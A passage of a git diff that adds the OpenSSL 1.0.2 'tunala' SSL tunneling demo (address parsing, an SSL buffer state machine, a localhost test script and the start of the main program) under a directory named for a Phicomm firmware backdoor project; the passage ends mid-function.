+    return fd;
+ err:
+    if (fd != -1)
+        close(fd);
+    return -1;
+}
+
+static char all_local_ip[] = { 0x00, 0x00, 0x00, 0x00 };
+
+int ip_parse_address(const char *address, const char **parsed_ip,
+                     unsigned short *parsed_port, int accept_all_ip)
+{
+    char buf[256];
+    struct hostent *lookup;
+    unsigned long port;
+    const char *ptr = strstr(address, ":");
+    const char *ip = all_local_ip;
+
+    if (!ptr) {
+        /*
+         * We assume we're listening on all local interfaces and have only
+         * specified a port.
+         */
+        if (!accept_all_ip)
+            return 0;
+        ptr = address;
+        goto determine_port;
+    }
+    if ((ptr - address) > 255)
+        return 0;
+    memset(buf, 0, 256);
+    memcpy(buf, address, ptr - address);
+    ptr++;
+    if ((lookup = gethostbyname(buf)) == NULL) {
+        /*
+         * Spit a message to differentiate between lookup failures and bad
+         * strings.
+         */
+        fprintf(stderr, "hostname lookup for '%s' failed\n", buf);
+        return 0;
+    }
+    ip = lookup->h_addr_list[0];
+ determine_port:
+    if (strlen(ptr) < 1)
+        return 0;
+    if (!int_strtoul(ptr, &port) || (port > 65535))
+        return 0;
+    *parsed_ip = ip;
+    *parsed_port = (unsigned short)port;
+    return 1;
+}
+
+int ip_create_listener(const char *address)
+{
+    const char *ip;
+    unsigned short port;
+
+    if (!ip_parse_address(address, &ip, &port, 1))
+        return -1;
+    return ip_create_listener_split(ip, port);
+}
+
+int ip_create_connection(const char *address)
+{
+    const char *ip;
+    unsigned short port;
+
+    if (!ip_parse_address(address, &ip, &port, 0))
+        return -1;
+    return ip_create_connection_split(ip, port);
+}
+
+int ip_accept_connection(int listen_fd)
+{
+    return accept(listen_fd, NULL, NULL);
+}
+
+#endif                          /* !defined(NO_IP) */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/sm.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/sm.c
new file mode 100644
index 0000000..5658dff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/sm.c
@@ -0,0 +1,164 @@
+#include "tunala.h"
+
+#ifndef NO_TUNALA
+
+void state_machine_init(state_machine_t * machine)
+{
+    machine->ssl = NULL;
+    machine->bio_intossl = machine->bio_fromssl = NULL;
+    buffer_init(&machine->clean_in);
+    buffer_init(&machine->clean_out);
+    buffer_init(&machine->dirty_in);
+    buffer_init(&machine->dirty_out);
+}
+
+void state_machine_close(state_machine_t * machine)
+{
+    if (machine->ssl)
+        SSL_free(machine->ssl);
+    /*
+     * SSL_free seems to decrement the reference counts already so doing this
+     * goes kaboom.
+     */
+# if 0
+    if (machine->bio_intossl)
+        BIO_free(machine->bio_intossl);
+    if (machine->bio_fromssl)
+        BIO_free(machine->bio_fromssl);
+# endif
+    buffer_close(&machine->clean_in);
+    buffer_close(&machine->clean_out);
+    buffer_close(&machine->dirty_in);
+    buffer_close(&machine->dirty_out);
+    state_machine_init(machine);
+}
+
+buffer_t *state_machine_get_buffer(state_machine_t * machine,
+                                   sm_buffer_t type)
+{
+    switch (type) {
+    case SM_CLEAN_IN:
+        return &machine->clean_in;
+    case SM_CLEAN_OUT:
+        return &machine->clean_out;
+    case SM_DIRTY_IN:
+        return &machine->dirty_in;
+    case SM_DIRTY_OUT:
+        return &machine->dirty_out;
+    default:
+        break;
+    }
+    /* Should never get here */
+    abort();
+    return NULL;
+}
+
+SSL *state_machine_get_SSL(state_machine_t * machine)
+{
+    return machine->ssl;
+}
+
+int state_machine_set_SSL(state_machine_t * machine, SSL *ssl, int is_server)
+{
+    if (machine->ssl)
+        /* Shouldn't ever be set twice */
+        abort();
+    machine->ssl = ssl;
+    /* Create the BIOs to handle the dirty side of the SSL */
+    if ((machine->bio_intossl = BIO_new(BIO_s_mem())) == NULL)
+        abort();
+    if ((machine->bio_fromssl = BIO_new(BIO_s_mem())) == NULL)
+        abort();
+    /* Hook up the BIOs on the dirty side of the SSL */
+    SSL_set_bio(machine->ssl, machine->bio_intossl, machine->bio_fromssl);
+    if (is_server)
+        SSL_set_accept_state(machine->ssl);
+    else
+        SSL_set_connect_state(machine->ssl);
+    /*
+     * If we're the first one to generate traffic - do it now otherwise we go
+     * into the next select empty-handed and our peer will not send data but
+     * will similarly wait for us.
+     */
+    return state_machine_churn(machine);
+}
+
+/* Performs the data-IO loop and returns zero if the machine should close */
+int state_machine_churn(state_machine_t * machine)
+{
+    unsigned int loop;
+    if (machine->ssl == NULL) {
+        if (buffer_empty(&machine->clean_out))
+            /* Time to close this state-machine altogether */
+            return 0;
+        else
+            /* Still buffered data on the clean side to go out */
+            return 1;
+    }
+    /*
+     * Do this loop twice to cover any dependencies about which precise order
+     * of reads and writes is required.
+     */
+    for (loop = 0; loop < 2; loop++) {
+        buffer_to_SSL(&machine->clean_in, machine->ssl);
+        buffer_to_BIO(&machine->dirty_in, machine->bio_intossl);
+        buffer_from_SSL(&machine->clean_out, machine->ssl);
+        buffer_from_BIO(&machine->dirty_out, machine->bio_fromssl);
+    }
+    /*
+     * We close on the SSL side if the info callback noticed some problems or
+     * an SSL shutdown was underway and shutdown traffic had all been sent.
+     */
+    if (SSL_get_app_data(machine->ssl) || (SSL_get_shutdown(machine->ssl) &&
+                                           buffer_empty(&machine->dirty_out)))
+    {
+        /* Great, we can seal off the dirty side completely */
+        if (!state_machine_close_dirty(machine))
+            return 0;
+    }
+    /*
+     * Either the SSL is alive and well, or the closing process still has
+     * outgoing data waiting to be sent
+     */
+    return 1;
+}
+
+/* Called when the clean side of the SSL has lost its connection */
+int state_machine_close_clean(state_machine_t * machine)
+{
+    /*
+     * Well, first thing to do is null out the clean-side buffers - they're
+     * no use any more.
+     */
+    buffer_close(&machine->clean_in);
+    buffer_close(&machine->clean_out);
+    /* And start an SSL shutdown */
+    if (machine->ssl)
+        SSL_shutdown(machine->ssl);
+    /* This is an "event", so flush the SSL of any generated traffic */
+    state_machine_churn(machine);
+    if (buffer_empty(&machine->dirty_in) && buffer_empty(&machine->dirty_out))
+        return 0;
+    return 1;
+}
+
+/*
+ * Called when the dirty side of the SSL has lost its connection. This is
+ * pretty terminal as all that can be left to do is send any buffered output
+ * on the clean side - after that, we're done.
+ */
+int state_machine_close_dirty(state_machine_t * machine)
+{
+    buffer_close(&machine->dirty_in);
+    buffer_close(&machine->dirty_out);
+    buffer_close(&machine->clean_in);
+    if (machine->ssl)
+        SSL_free(machine->ssl);
+    machine->ssl = NULL;
+    machine->bio_intossl = machine->bio_fromssl = NULL;
+    if (buffer_empty(&machine->clean_out))
+        return 0;
+    return 1;
+}
+
+#endif                          /* !defined(NO_TUNALA) */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/test.sh b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/test.sh
new file mode 100755
index 0000000..105b447
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/test.sh
@@ -0,0 +1,107 @@
+#!/bin/sh
+
+HTTP="localhost:8080"
+CLIENT_PORT="9020"
+SERVER_PORT="9021"
+
+sub_test ()
+{
+	echo "STARTING - $VER $CIPHER"
+	./tunala -listen localhost:$CLIENT_PORT -proxy localhost:$SERVER_PORT \
+		-cacert CA.pem -cert A-client.pem -server 0 \
+		-dh_special standard -v_peer -v_strict \
+		$VER -cipher $CIPHER 1> tc1.txt 2> tc2.txt &
+	./tunala -listen localhost:$SERVER_PORT -proxy $HTTP \
+		-cacert CA.pem -cert A-server.pem -server 1 \
+		-dh_special standard -v_peer -v_strict \
+		$VER -cipher $CIPHER 1> ts1.txt 2> ts2.txt &
+	# Wait for the servers to be listening before starting the wget test
+	DONE="no"
+	while [ "$DONE" != "yes" ]; do
+		L1=`netstat -a | egrep "LISTEN[\t ]*$" | grep ":$CLIENT_PORT"`
+		L2=`netstat -a | egrep "LISTEN[\t ]*$" | grep ":$SERVER_PORT"`
+		if [ "x$L1" != "x" ]; then
+			DONE="yes"
+		elif [ "x$L2" != "x" ]; then
+			DONE="yes"
+		else
+			sleep 1
+		fi
+	done
+	HTML=`wget -O - -T 1 http://localhost:$CLIENT_PORT 2> /dev/null | grep "<HTML>"`
+	if [ "x$HTML" != "x" ]; then
+		echo "OK - $CIPHER ($VER)"
+	else
+		echo "FAIL - $CIPHER ($VER)"
+		killall tunala
+		exit 1
+	fi
+	killall tunala
+	# Wait for the servers to stop before returning - otherwise the next
+	# test my fail to start ... (fscking race conditions)
+	DONE="yes"
+	while [ "$DONE" != "no" ]; do
+		L1=`netstat -a | egrep "LISTEN[\t ]*$" | grep ":$CLIENT_PORT"`
+		L2=`netstat -a | egrep "LISTEN[\t ]*$" | grep ":$SERVER_PORT"`
+		if [ "x$L1" != "x" ]; then
+			DONE="yes"
+		elif [ "x$L2" != "x" ]; then
+			DONE="yes"
+		else
+			DONE="no"
+		fi
+	done
+	exit 0
+}
+
+run_test ()
+{
+	(sub_test 1> /dev/null) || exit 1
+}
+
+run_ssl_test ()
+{
+killall tunala 1> /dev/null 2> /dev/null
+echo ""
+echo "Starting all $PRETTY tests"
+if [ "$PRETTY" != "SSLv2" ]; then
+	if [ "$PRETTY" != "SSLv3" ]; then
+		export VER="-no_ssl2 -no_ssl3"
+		export OSSL="-tls1"
+	else
+		export VER="-no_ssl2 -no_tls1"
+		export OSSL="-ssl3"
+	fi
+else
+	export VER="-no_ssl3 -no_tls1"
+	export OSSL="-ssl2"
+fi
+LIST="`../../apps/openssl ciphers $OSSL | sed -e 's/:/ /g'`"
+#echo "$LIST"
+for i in $LIST; do \
+	DSS=`echo "$i" | grep "DSS"`
+	if [ "x$DSS" != "x" ]; then
+		echo "---- skipping $i (no DSA cert/keys) ----"
+	else
+		export CIPHER=$i
+		run_test
+		echo "SUCCESS: $i"
+	fi
+done;
+}
+
+# Welcome the user
+echo "Tests will assume an http server running at $HTTP"
+
+# TLSv1 test
+export PRETTY="TLSv1"
+run_ssl_test
+
+# SSLv3 test
+export PRETTY="SSLv3"
+run_ssl_test
+
+# SSLv2 test
+export PRETTY="SSLv2"
+run_ssl_test
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.c
new file mode 100644
index 0000000..11a7c5b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/tunala/tunala.c
@@ -0,0 +1,1183 @@
+#if defined(NO_BUFFER) || defined(NO_IP) || defined(NO_OPENSSL)
+# error "Badness, NO_BUFFER, NO_IP or NO_OPENSSL is defined, turn them *off*"
+#endif
+
+/* Include our bits'n'pieces */
+#include "tunala.h"
+
+/********************************************/
+/* Our local types that specify our "world" */
+/********************************************/
+
+/*
+ * These represent running "tunnels". Eg. if you wanted to do SSL in a
+ * "message-passing" scanario, the "int" file-descriptors might be replaced
+ * by thread or process IDs, and the "select" code might be replaced by
+ * message handling code. Whatever.
+ */
+typedef struct _tunala_item_t {
+    /*
+     * The underlying SSL state machine. This is a data-only processing unit
+     * and we communicate with it by talking to its four "buffers".
+     */
+    state_machine_t sm;
+    /*
+     * The file-descriptors for the "dirty" (encrypted) side of the SSL
+     * setup. In actuality, this is typically a socket and both values are
+     * identical.
+     */
+    int dirty_read, dirty_send;
+    /*
+     * The file-descriptors for the "clean" (unencrypted) side of the SSL
+     * setup. These could be stdin/stdout, a socket (both values the same),
+     * or whatever you like.
+     */
+    int clean_read, clean_send;
+} tunala_item_t;
+
+/*
+ * This structure is used as the data for running the main loop. Namely, in a
+ * network format such as this, it is stuff for select() - but as pointed out,
+ * when moving the real-world to somewhere else, this might be replaced by
+ * something entirely different. It's basically the stuff that controls when
+ * it's time to do some "work".
+ */
+typedef struct _select_sets_t {
+    int max;                    /* As required as the first argument to
+                                 * select() */
+    fd_set reads, sends, excepts; /* As passed to select() */
+} select_sets_t;
+typedef struct _tunala_selector_t {
+    select_sets_t last_selected; /* Results of the last select() */
+    select_sets_t next_select;  /* What we'll next select on */
+} tunala_selector_t;
+
+/*
+ * This structure is *everything*. We do it to avoid the use of globals so
+ * that, for example, it would be easier to shift things around between
+ * async-IO, thread-based, or multi-fork()ed (or combinations thereof).
+ */
+typedef struct _tunala_world_t {
+    /* The file-descriptor we "listen" on for new connections */
+    int listen_fd;
+    /* The array of tunnels */
+    tunala_item_t *tunnels;
+    /* the number of tunnels in use and allocated, respectively */
+    unsigned int tunnels_used, tunnels_size;
+    /* Our outside "loop" context stuff */
+    tunala_selector_t selector;
+    /*
+     * Our SSL_CTX, which is configured as the SSL client or server and has
+     * the various cert-settings and callbacks configured.
+     */
+    SSL_CTX *ssl_ctx;
+    /*
+     * Simple flag with complex logic :-) Indicates whether we're an SSL
+     * server or an SSL client.
+     */
+    int server_mode;
+} tunala_world_t;
+
+/*****************************/
+/* Internal static functions */
+/*****************************/
+
+static SSL_CTX *initialise_ssl_ctx(int server_mode, const char *engine_id,
+                                   const char *CAfile, const char *cert,
+                                   const char *key, const char *dcert,
+                                   const char *dkey, const char *cipher_list,
+                                   const char *dh_file,
+                                   const char *dh_special, int tmp_rsa,
+                                   int ctx_options, int out_state,
+                                   int out_verify, int verify_mode,
+                                   unsigned int verify_depth);
+static void selector_init(tunala_selector_t * selector);
+static void selector_add_listener(tunala_selector_t * selector, int fd);
+static void selector_add_tunala(tunala_selector_t * selector,
+                                tunala_item_t * t);
+static int selector_select(tunala_selector_t * selector);
+/*
+ * This returns -1 for error, 0 for no new connections, or 1 for success, in
+ * which case *newfd is populated.
+ */
+static int selector_get_listener(tunala_selector_t * selector, int fd,
+                                 int *newfd);
+static int tunala_world_new_item(tunala_world_t * world, int fd,
+                                 const char *ip, unsigned short port,
+                                 int flipped);
+static void tunala_world_del_item(tunala_world_t * world, unsigned int idx);
+static int tunala_item_io(tunala_selector_t * selector, tunala_item_t * item);
+
+/*********************************************/
+/* MAIN FUNCTION (and its utility functions) */
+/*********************************************/
+
+static const char *def_proxyhost = "127.0.0.1:443";
+static const char *def_listenhost = "127.0.0.1:8080";
+static int def_max_tunnels = 50;
+static const char *def_cacert = NULL;
+static const char *def_cert = NULL;
+static const char *def_key = NULL;
+static const char *def_dcert = NULL;
+static const char *def_dkey = NULL;
+static const char *def_engine_id = NULL;
+static int def_server_mode = 0;
+static int def_flipped = 0;
+static const char *def_cipher_list = NULL;
+static const char *def_dh_file = NULL;
+static const char *def_dh_special = NULL;
+static int def_tmp_rsa = 1;
+static int def_ctx_options = 0;
+static int def_verify_mode = 0;
+static unsigned int def_verify_depth = 10;
+static int def_out_state = 0;
+static unsigned int def_out_verify = 0;
+static int def_out_totals = 0;
+static int def_out_conns = 0;
+
+static const char *helpstring =
+    "\n'Tunala' (A tunneler with a New Zealand accent)\n"
+    "Usage: tunala [options], where options are from;\n"
+    " -listen [host:]<port>  (default = 127.0.0.1:8080)\n"
+    " -proxy <host>:<port>   (default = 127.0.0.1:443)\n"
+    " -maxtunnels <num>      (default = 50)\n"
+    " -cacert <path|NULL>    (default = NULL)\n"
+    " -cert <path|NULL>      (default = NULL)\n"
+    " -key <path|NULL>       (default = whatever '-cert' is)\n"
+    " -dcert <path|NULL>     (usually for DSA, default = NULL)\n"
+    " -dkey <path|NULL>      (usually for DSA, default = whatever '-dcert' is)\n"
+    " -engine <id|NULL>      (default = NULL)\n"
+    " -server <0|1>          (default = 0, ie. an SSL client)\n"
+    " -flipped <0|1>         (makes SSL servers be network clients, and vice versa)\n"
+    " -cipher <list>         (specifies cipher list to use)\n"
+    " -dh_file <path>        (a PEM file containing DH parameters to use)\n"
+    " -dh_special <NULL|generate|standard> (see below: def=NULL)\n"
+    " -no_tmp_rsa            (don't generate temporary RSA keys)\n"
+    " -no_ssl2               (disable SSLv2)\n"
+    " -no_ssl3               (disable SSLv3)\n"
+    " -no_tls1               (disable TLSv1)\n"
+    " -v_peer                (verify the peer certificate)\n"
+    " -v_strict              (do not continue if peer doesn't authenticate)\n"
+    " -v_once                (no verification in renegotiates)\n"
+    " -v_depth <num>         (limit certificate chain depth, default = 10)\n"
+    " -out_conns             (prints client connections and disconnections)\n"
+    " -out_state             (prints SSL handshake states)\n"
+    " -out_verify <0|1|2|3>  (prints certificate verification states: def=1)\n"
+    " -out_totals            (prints out byte-totals when a tunnel closes)\n"
+    " -<h|help|?>            (displays this help screen)\n"
+    "Notes:\n"
+    "(1) It is recommended to specify a cert+key when operating as an SSL server.\n"
+    "    If you only specify '-cert', the same file must contain a matching\n"
+    "    private key.\n"
+    "(2) Either dh_file or dh_special can be used to specify where DH parameters\n"
+    "    will be obtained from (or '-dh_special NULL' for the default choice) but\n"
+    "    you cannot specify both. For dh_special, 'generate' will create new DH\n"
+    "    parameters on startup, and 'standard' will use embedded parameters\n"
+    "    instead.\n"
+    "(3) Normally an ssl client connects to an ssl server - so that an 'ssl client\n"
+    "    tunala' listens for 'clean' client connections and proxies ssl, and an\n"
+    "    'ssl server tunala' listens for ssl connections and proxies 'clean'. With\n"
+    "    '-flipped 1', this behaviour is reversed so that an 'ssl server tunala'\n"
+    "    listens for clean client connections and proxies ssl (but participating\n"
+    "    as an ssl *server* in the SSL/TLS protocol), and an 'ssl client tunala'\n"
+    "    listens for ssl connections (participating as an ssl *client* in the\n"
+    "    SSL/TLS protocol) and proxies 'clean' to the end destination. This can\n"
+    "    be useful for allowing network access to 'servers' where only the server\n"
+    "    needs to authenticate the client (ie. the other way is not required).\n"
+    "    Even with client and server authentication, this 'technique' mitigates\n"
+    "    some DoS (denial-of-service) potential as it will be the network client\n"
+    "    having to perform the first private key operation rather than the other\n"
+    "    way round.\n"
+    "(4) The 'technique' used by setting '-flipped 1' is probably compatible with\n"
+    "    absolutely nothing except another complimentary instance of 'tunala'\n"
+    "    running with '-flipped 1'. :-)\n";
+
+/*
+ * Default DH parameters for use with "-dh_special standard" ... stolen
+ * striaght from s_server.
+ */
+static unsigned char dh512_p[] = {
+    0xDA, 0x58, 0x3C, 0x16, 0xD9, 0x85, 0x22, 0x89, 0xD0, 0xE4, 0xAF, 0x75,
+    0x6F, 0x4C, 0xCA, 0x92, 0xDD, 0x4B, 0xE5, 0x33, 0xB8, 0x04, 0xFB, 0x0F,
+    0xED, 0x94, 0xEF, 0x9C, 0x8A, 0x44, 0x03, 0xED, 0x57, 0x46, 0x50, 0xD3,
+    0x69, 0x99, 0xDB, 0x29, 0xD7, 0x76, 0x27, 0x6B, 0xA2, 0xD3, 0xD4, 0x12,
+    0xE2, 0x18, 0xF4, 0xDD, 0x1E, 0x08, 0x4C, 0xF6, 0xD8, 0x00, 0x3E, 0x7C,
+    0x47, 0x74, 0xE8, 0x33,
+};
+
+static unsigned char dh512_g[] = {
+    0x02,
+};
+
+/*
+ * And the function that parses the above "standard" parameters, again,
+ * straight out of s_server.
+ */
+static DH *get_dh512(void)
+{
+    DH *dh = NULL;
+
+    if ((dh = DH_new()) == NULL)
+        return (NULL);
+    dh->p = BN_bin2bn(dh512_p, sizeof(dh512_p), NULL);
+    dh->g = BN_bin2bn(dh512_g, sizeof(dh512_g), NULL);
+    if ((dh->p == NULL) || (dh->g == NULL))
+        return (NULL);
+    return (dh);
+}
+
+/* Various help/error messages used by main() */
+static int usage(const char *errstr, int isunknownarg)
+{
+    if (isunknownarg)
+        fprintf(stderr, "Error: unknown argument '%s'\n", errstr);
+    else
+        fprintf(stderr, "Error: %s\n", errstr);
+    fprintf(stderr, "%s\n", helpstring);
+    return 1;
+}
+
+static int err_str0(const char *str0)
+{
+    fprintf(stderr, "%s\n", str0);
+    return 1;
+}
+
+static int err_str1(const char *fmt, const char *str1)
+{
+    fprintf(stderr, fmt, str1);
+    fprintf(stderr, "\n");
+    return 1;
+}
+
+static int parse_max_tunnels(const char *s, unsigned int *maxtunnels)
+{
+    unsigned long l;
+    if (!int_strtoul(s, &l) || (l < 1) || (l > 1024)) {
+        fprintf(stderr, "Error, '%s' is an invalid value for "
+                "maxtunnels\n", s);
+        return 0;
+    }
+    *maxtunnels = (unsigned int)l;
+    return 1;
+}
+
+static int parse_server_mode(const char *s, int *servermode)
+{
+    unsigned long l;
+    if (!int_strtoul(s, &l) || (l > 1)) {
+        fprintf(stderr, "Error, '%s' is an invalid value for the "
+                "server mode\n", s);
+        return 0;
+    }
+    *servermode = (int)l;
+    return 1;
+}
+
+static int parse_dh_special(const char *s, const char **dh_special)
+{
+    if ((strcmp(s, "NULL") == 0) || (strcmp(s, "generate") == 0) ||
+        (strcmp(s, "standard") == 0)) {
+        *dh_special = s;
+        return 1;
+    }
+    fprintf(stderr, "Error, '%s' is an invalid value for 'dh_special'\n", s);
+    return 0;
+}
+
+static int parse_verify_level(const char *s, unsigned int *verify_level)
+{
+    unsigned long l;
+    if (!int_strtoul(s, &l) || (l > 3)) {
+        fprintf(stderr, "Error, '%s' is an invalid value for "
+                "out_verify\n", s);
+        return 0;
+    }
+    *verify_level = (unsigned int)l;
+    return 1;
+}
+
+static int parse_verify_depth(const char *s, unsigned int *verify_depth)
+{
+    unsigned long l;
+    if (!int_strtoul(s, &l) || (l < 1) || (l > 50)) {
+        fprintf(stderr, "Error, '%s' is an invalid value for "
+                "verify_depth\n", s);
+        return 0;
+    }
+    *verify_depth = (unsigned int)l;
+    return 1;
+}
+
+/* Some fprintf format strings used when tunnels close */
+static const char *io_stats_dirty =
+    "    SSL traffic;   %8lu bytes in, %8lu bytes out\n";
+static const char *io_stats_clean =
+    "    clear traffic; %8lu bytes in, %8lu bytes out\n";
+
+int main(int argc, char *argv[])
+{
+    unsigned int loop;
+    int newfd;
+    tunala_world_t world;
+    tunala_item_t *t_item;
+    const char *proxy_ip;
+    unsigned short proxy_port;
+    /* Overridables */
+    const char *proxyhost = def_proxyhost;
+    const char *listenhost = def_listenhost;
+    unsigned int max_tunnels = def_max_tunnels;
+    const char *cacert = def_cacert;
+    const char *cert = def_cert;
+    const char *key = def_key;
+    const char *dcert = def_dcert;
+    const char *dkey = def_dkey;
+    const char *engine_id = def_engine_id;
+    int server_mode = def_server_mode;
+    int flipped = def_flipped;
+    const char *cipher_list = def_cipher_list;
+    const char *dh_file = def_dh_file;
+    const char *dh_special = def_dh_special;
+    int tmp_rsa = def_tmp_rsa;
+    int ctx_options = def_ctx_options;
+    int verify_mode = def_verify_mode;
+    unsigned int verify_depth = def_verify_depth;
+    int out_state = def_out_state;
+    unsigned int out_verify = def_out_verify;
+    int out_totals = def_out_totals;
+    int out_conns = def_out_conns;
+
+/* Parse command-line arguments */
+ next_arg:
+    argc--;
+    argv++;
+    if (argc > 0) {
+        if (strcmp(*argv, "-listen") == 0) {
+            if (argc < 2)
+                return usage("-listen requires an argument", 0);
+            argc--;
+            argv++;
+            listenhost = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-proxy") == 0) {
+            if (argc < 2)
+                return usage("-proxy requires an argument", 0);
+            argc--;
+            argv++;
+            proxyhost = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-maxtunnels") == 0) {
+            if (argc < 2)
+                return usage("-maxtunnels requires an argument", 0);
+            argc--;
+            argv++;
+            if (!parse_max_tunnels(*argv, &max_tunnels))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-cacert") == 0) {
+            if (argc < 2)
+                return usage("-cacert requires an argument", 0);
+            argc--;
+            argv++;
+            if (strcmp(*argv, "NULL") == 0)
+                cacert = NULL;
+            else
+                cacert = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-cert") == 0) {
+            if (argc < 2)
+                return usage("-cert requires an argument", 0);
+            argc--;
+            argv++;
+            if (strcmp(*argv, "NULL") == 0)
+                cert = NULL;
+            else
+                cert = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-key") == 0) {
+            if (argc < 2)
+                return usage("-key requires an argument", 0);
+            argc--;
+            argv++;
+            if (strcmp(*argv, "NULL") == 0)
+                key = NULL;
+            else
+                key = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-dcert") == 0) {
+            if (argc < 2)
+                return usage("-dcert requires an argument", 0);
+            argc--;
+            argv++;
+            if (strcmp(*argv, "NULL") == 0)
+                dcert = NULL;
+            else
+                dcert = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-dkey") == 0) {
+            if (argc < 2)
+                return usage("-dkey requires an argument", 0);
+            argc--;
+            argv++;
+            if (strcmp(*argv, "NULL") == 0)
+                dkey = NULL;
+            else
+                dkey = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-engine") == 0) {
+            if (argc < 2)
+                return usage("-engine requires an argument", 0);
+            argc--;
+            argv++;
+            engine_id = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-server") == 0) {
+            if (argc < 2)
+                return usage("-server requires an argument", 0);
+            argc--;
+            argv++;
+            if (!parse_server_mode(*argv, &server_mode))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-flipped") == 0) {
+            if (argc < 2)
+                return usage("-flipped requires an argument", 0);
+            argc--;
+            argv++;
+            if (!parse_server_mode(*argv, &flipped))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-cipher") == 0) {
+            if (argc < 2)
+                return usage("-cipher requires an argument", 0);
+            argc--;
+            argv++;
+            cipher_list = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-dh_file") == 0) {
+            if (argc < 2)
+                return usage("-dh_file requires an argument", 0);
+            if (dh_special)
+                return usage("cannot mix -dh_file with " "-dh_special", 0);
+            argc--;
+            argv++;
+            dh_file = *argv;
+            goto next_arg;
+        } else if (strcmp(*argv, "-dh_special") == 0) {
+            if (argc < 2)
+                return usage("-dh_special requires an argument", 0);
+            if (dh_file)
+                return usage("cannot mix -dh_file with " "-dh_special", 0);
+            argc--;
+            argv++;
+            if (!parse_dh_special(*argv, &dh_special))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-no_tmp_rsa") == 0) {
+            tmp_rsa = 0;
+            goto next_arg;
+        } else if (strcmp(*argv, "-no_ssl2") == 0) {
+            ctx_options |= SSL_OP_NO_SSLv2;
+            goto next_arg;
+        } else if (strcmp(*argv, "-no_ssl3") == 0) {
+            ctx_options |= SSL_OP_NO_SSLv3;
+            goto next_arg;
+        } else if (strcmp(*argv, "-no_tls1") == 0) {
+            ctx_options |= SSL_OP_NO_TLSv1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-v_peer") == 0) {
+            verify_mode |= SSL_VERIFY_PEER;
+            goto next_arg;
+        } else if (strcmp(*argv, "-v_strict") == 0) {
+            verify_mode |= SSL_VERIFY_FAIL_IF_NO_PEER_CERT;
+            goto next_arg;
+        } else if (strcmp(*argv, "-v_once") == 0) {
+            verify_mode |= SSL_VERIFY_CLIENT_ONCE;
+            goto next_arg;
+        } else if (strcmp(*argv, "-v_depth") == 0) {
+            if (argc < 2)
+                return usage("-v_depth requires an argument", 0);
+            argc--;
+            argv++;
+            if (!parse_verify_depth(*argv, &verify_depth))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-out_state") == 0) {
+            out_state = 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-out_verify") == 0) {
+            if (argc < 2)
+                return usage("-out_verify requires an argument", 0);
+            argc--;
+            argv++;
+            if (!parse_verify_level(*argv, &out_verify))
+                return 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-out_totals") == 0) {
+            out_totals = 1;
+            goto next_arg;
+        } else if (strcmp(*argv, "-out_conns") == 0) {
+            out_conns = 1;
+            goto next_arg;
+        } else if ((strcmp(*argv, "-h") == 0) ||
+                   (strcmp(*argv, "-help") == 0) ||
+                   (strcmp(*argv, "-?") == 0)) {
+            fprintf(stderr, "%s\n", helpstring);
+            return 0;
+        } else
+            return usage(*argv, 1);
+    }
+    /* Run any sanity checks we want here */
+    if (!cert && !dcert && server_mode)
+        fprintf(stderr, "WARNING: you are running an SSL server without "
+                "a certificate - this may not work!\n");
+
+    /* Initialise network stuff */
+    if (!ip_initialise())
+        return err_str0("ip_initialise failed");
+    /* Create the SSL_CTX */
+    if ((world.ssl_ctx = initialise_ssl_ctx(server_mode, engine_id,
+                                            cacert, cert, key, dcert, dkey,
+                                            cipher_list, dh_file, dh_special,
+                                            tmp_rsa, ctx_options, out_state,
+                                            out_verify, verify_mode,
+                                            verify_depth)) == NULL)
+        return err_str1("initialise_ssl_ctx(engine_id=%s) failed",
+                        (engine_id == NULL) ? "NULL" : engine_id);
+    if (engine_id)
+        fprintf(stderr, "Info, engine '%s' initialised\n", engine_id);
+    /* Create the listener */
+    if ((world.listen_fd = ip_create_listener(listenhost)) == -1)
+        return err_str1("ip_create_listener(%s) failed", listenhost);
+    fprintf(stderr, "Info, listening on '%s'\n", listenhost);
+    if (!ip_parse_address(proxyhost, &proxy_ip, &proxy_port, 0))
+        return err_str1("ip_parse_address(%s) failed", proxyhost);
+    fprintf(stderr, "Info, proxying to '%s' (%d.%d.%d.%d:%d)\n", proxyhost,
+            (int)proxy_ip[0], (int)proxy_ip[1],
+            (int)proxy_ip[2], (int)proxy_ip[3], (int)proxy_port);
+    fprintf(stderr, "Info, set maxtunnels to %d\n", (int)max_tunnels);
+    fprintf(stderr, "Info, set to operate as an SSL %s\n",
+            (server_mode ? "server" : "client"));
+    /* Initialise the rest of the stuff */
+    world.tunnels_used = world.tunnels_size = 0;
+    world.tunnels = NULL;
+    world.server_mode = server_mode;
+    selector_init(&world.selector);
+
+/* We're ready to loop */
+ main_loop:
+    /* Should we listen for *new* tunnels? */
+    if (world.tunnels_used < max_tunnels)
+        selector_add_listener(&world.selector, world.listen_fd);
+    /* We should add in our existing tunnels */
